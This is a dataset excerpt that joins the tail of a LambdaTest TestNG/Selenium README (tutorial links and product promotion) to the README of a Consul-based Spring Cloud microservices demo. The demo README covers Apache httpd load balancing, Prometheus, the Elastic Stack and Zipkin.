Testing](https://www.lambdatest.com/blog/junit-5-vs-testng/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) * [How To Install TestNG?](https://www.lambdatest.com/blog/how-to-install-testng-in-eclipse-step-by-step-guide/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) * [Create TestNG Project in Eclipse & Run Selenium Test Script](https://www.lambdatest.com/blog/create-testng-project-in-eclipse-run-selenium-test-script/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) * [A Complete Guide for Your First TestNG Automation Script](https://www.lambdatest.com/blog/a-complete-guide-for-your-first-testng-automation-script/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) * [How to Automate using TestNG in Selenium?](https://www.lambdatest.com/blog/testng-in-selenium/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) * [How to Perform Parallel Test Execution in TestNG with Selenium](https://www.lambdatest.com/blog/parallel-test-execution-in-testng/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) * [Creating TestNG XML File & Execute Parallel Testing](https://www.lambdatest.com/blog/create-testng-xml-file-execute-parallel-testing/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) * [Speed Up Automated Parallel Testing in Selenium with TestNG](https://www.lambdatest.com/blog/speed-up-automated-parallel-testing-in-selenium-with-testng/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) * [Automation Testing With Selenium, Cucumber & TestNG](https://www.lambdatest.com/blog/automation-testing-with-selenium-cucumber-testng/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) * [How to Run JUnit Selenium Tests using TestNG](https://www.lambdatest.com/blog/test-example-junit-and-testng-in-selenium/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) * [How to Group Test Cases in TestNG [With Examples]](https://www.lambdatest.com/blog/grouping-test-cases-in-testng/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) * [How to Set Test Case Priority in TestNG with Selenium](https://www.lambdatest.com/blog/prioritizing-tests-in-testng-with-selenium/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) * [How to Use Assertions in TestNG with Selenium](https://www.lambdatest.com/blog/asserts-in-testng/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) * [How to Use DataProviders in TestNG [With Examples]](https://www.lambdatest.com/blog/how-to-use-dataproviders-in-testng-with-examples/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) * [Parameterization in TestNG - DataProvider and TestNG XML [With Examples]](https://www.lambdatest.com/blog/parameterization-in-testng-dataprovider-and-testng-xml-examples/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) * [TestNG Listeners in Selenium WebDriver [With Examples]](https://www.lambdatest.com/blog/testng-listeners-in-selenium-webdriver-with-examples/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) * [TestNG Annotations Tutorial with Examples for Selenium Automation](https://www.lambdatest.com/blog/complete-guide-on-testng-annotations-for-selenium-webdriver/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) * [How to Use TestNG Reporter Log in Selenium](https://www.lambdatest.com/blog/how-to-use-testng-reporter-log-in-selenium/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) * [How to Generate TestNG Reports in Jenkins](https://www.lambdatest.com/blog/how-to-generate-testng-reports-in-jenkins/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) ## Documentation & Resources :books: Visit the following links to learn more about LambdaTest's features, setup and tutorials around test automation, mobile app testing, responsive testing, and manual testing. * [LambdaTest Documentation](https://www.lambdatest.com/support/docs/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) * [LambdaTest Blog](https://www.lambdatest.com/blog/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) * [LambdaTest Learning Hub](https://www.lambdatest.com/learning-hub/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) ## LambdaTest Community :busts_in_silhouette: The [LambdaTest Community](https://community.lambdatest.com/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) allows people to interact with tech enthusiasts. Connect, ask questions, and learn from tech-savvy people. Discuss best practises in web development, testing, and DevOps with professionals from across the globe 🌎 ## What's New At LambdaTest ❓ To stay updated with the latest features and product add-ons, visit [Changelog](https://changelog.lambdatest.com) ## About LambdaTest [LambdaTest](https://www.lambdatest.com/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) is a leading test execution and orchestration platform that is fast, reliable, scalable, and secure. It allows users to run both manual and automated testing of web and mobile apps across 3000+ different browsers, operating systems, and real device combinations. Using LambdaTest, businesses can ensure quicker developer feedback and hence achieve faster go to market. Over 500 enterprises and 1 Million + users across 130+ countries rely on LambdaTest for their testing needs. ### Features * Run Selenium, Cypress, Puppeteer, Playwright, and Appium automation tests across 3000+ real desktop and mobile environments. * Real-time cross browser testing on 3000+ environments. * Test on Real device cloud * Blazing fast test automation with HyperExecute * Accelerate testing, shorten job times and get faster feedback on code changes with Test At Scale. * Smart Visual Regression Testing on cloud * 120+ third-party integrations with your favorite tool for CI/CD, Project Management, Codeless Automation, and more. * Automated Screenshot testing across multiple browsers in a single click. * Local testing of web and mobile apps. * Online Accessibility Testing across 3000+ desktop and mobile browsers, browser versions, and operating systems. * Geolocation testing of web and mobile apps across 53+ countries. * LT Browser - for responsive testing across 50+ pre-installed mobile, tablets, desktop, and laptop viewports [<img height="58" width="200" src="https://user-images.githubusercontent.com/70570645/171866795-52c11b49-0728-4229-b073-4b704209ddde.png">](https://accounts.lambdatest.com/register?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) ## We are here to help you :headphones: * Got a query? we are available 24x7 to help. [Contact Us](mailto:support@lambdatest.com) * For more info, visit - [LambdaTest](https://www.lambdatest.com?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium)
1
ewolff/microservice-consul
Sample of a Microservice setup for my book ported to Consul / Apache httpd. Based on Spring Cloud / Netflix / Java / Docker / Docker Compose / Docker Machine
null
Microservice Consul Sample =================== [Deutsche Anleitung zum Starten des Beispiels](WIE-LAUFEN.md) This sample is like the sample for my Microservices Book ([English](http://microservices-book.com/) / [German](http://microservices-buch.de/)) that you can find at https://github.com/ewolff/microservice . However, this demo uses [Hashicorp Consul](https://www.consul.io) for service discovery and Apache httpd as a reverse proxy to route the calls to the services and as a load balancer. This project creates a complete micro service demo system in Docker containers. The services are implemented in Java using Spring and Spring Cloud. It uses three microservices: - `Order` to process orders. (http://localhost:8080 when started locally) - `Customer` to handle customer data. (http://localhost:8080) - `Catalog` to handle the items in the catalog. (http://localhost:8080) Consul ------ Consul has a Web UI. You can access it at port 8500 of your Docker host. Also the homepage at port 8080 contains a link to the Consul UI Also you can use Consul's DNS interface with e.g. dig: ``` dig @192.168.99.100 -p 8600 order.service.consul. dig @192.168.99.100 -p 8600 order.service.consul. ANY dig @192.168.99.100 -p 8600 order.service.consul. SRV ``` Note that the demo uses the original [Consul Docker image](https://hub.docker.com/_/consul/) provided by Hashicorp. However, the demo does not use a Consul cluster and only stores the data in memory i.e. it is certainly not fit for production. All the Spring Cloud microservices (customer, catalog and order) register themselves in the Consul server. An alternative approach to register the services is [Registrator](https://github.com/gliderlabs/registrator). An alternative to using Apache HTTP as a load balancer would e.g. be [Fabio](https://github.com/eBay/fabio). Apache HTTP Load Balancer ------------------------ Apache HTTP is used to provide the web page of the demo at port 8080. It also forwards HTTP requests to the microservices whose ports are not exposed! Apache HTTP is configured as a reverse proxy for this - and as a load balancer i.e. if you start multiple instances of a microservices e.g. via `docker-compose scale catalog=2`, Apache will recognize the new instance. To configure this Apache HTTP needs to get all registered services from Consul. [Consul Template](https://github.com/hashicorp/consul-template) is used for this. It uses a template for the Apache HTTP configuration and fills in the IP addresses of the registered services. The Docker container therefore runs two processes: Apache HTTP and Consul Template. Consul Template starts Apache httpd and also restarts Apache httpd when new services are registered in the Consul server. Please refer to the subdirectory `apache` to see how this works. Prometheus ---------- [Prometheus](https://prometheus.io/) is a monitoring system. The code of the [microservice-consul-demo-order](microservice-consul-demo/microservice-consul-demo-order) project includes code to export metrics to Prometheus in `com.ewolff.microservice.order.prometheus`. Also the docker-compose configuration in `docker-compose-prometheus.yml` includes a Prometheus instance. It will listen on port 9090 on the Docker host. That way you can monitor the application. Run it with `docker-compose -f docker-compose-prometheus.yml up -d`. Elastic Stack ----------- The [Elastic Stack](https://www.elastic.co/de/products) provides a set of tools to handle log data. The projects contain a Logback configuration in `logback-spring.xml` so that the services log JSON formatted data. The docker-compose configuration in `docker-compose-elastic.yml` includes * Filebeat to ship the log from a common volume to Elasticsearch. * Elasticsearch to store and analyse the logs. * Kibana to analyse the logs. You can access it on port 5601 e.g. at <http://localhost:5601>. The indices are called `filebeat-*`. You can run the configuration with `docker-compose -f docker-compose-elastic.yml up -d`. Zipkin ----- [Zipkin](http://zipkin.io/) is a tool to trace calls across microservices. The project includes all necessary libraries to provide traces. The docker-compose configuration in `docker-compose-zipkin.yml` includes * A Zipkin server to store and display the data. You can access it on port 9411 e.g. at <http://localhost:9411>. * Microservices are configured to provide trace information. You can run the configuration with `docker-compose -f docker-compose-zipkin.yml up -d`. Technologies ------------ - Consul for Lookup/ Discovery - Apache as a reverse proxy to route calls to the appropriate SCS. - [Ribbon](https://github.com/netflix/Ribbon) for client-side Load Balancing. See the classes `CatalogClient` and `CustomerClient` in the package `com.ewolff.microservice.order.clients` in the [microservice-demo-order](https://github.com/innoq/microservice-consul/tree/master/microservice-consul-demo/microservice-consul-demo-order) project. How To Run ---------- The demo can be run with [Docker Machine and Docker Compose](docker/README.md) via `docker-compose up` See [How to run](HOW-TO-RUN.md) for details. Remarks on the Code ------------------- The servers for the infrastructure components are pretty simple thanks to Spring Cloud: The microservices are: - [microservice-consul-demo-catalog](microservice-consul-demo/microservice-consul-demo-catalog) is the application to take care of items. - [microservice-consul-demo-customer](microservice-consul-demo/microservice-consul-demo-customer) is responsible for customers. - [microservice-consul-demo-order](microservice-consul-demo/microservice-consul-demo-order) does order processing. It uses microservice-demo-catalog and microservice-demo-customer. Ribbon is used for load balancing. The microservices have a Java main application in `src/test/java` to run them stand alone. `microservice-demo-order` uses a stub for the other services then. Also there are tests that use _consumer-driven contracts_. That is why it is ensured that the services provide the correct interface. These CDC tests are used in microservice-demo-order to verify the stubs. In `microservice-demo-customer` and `microserivce-demo-catalog` they are used to verify the implemented REST services.
1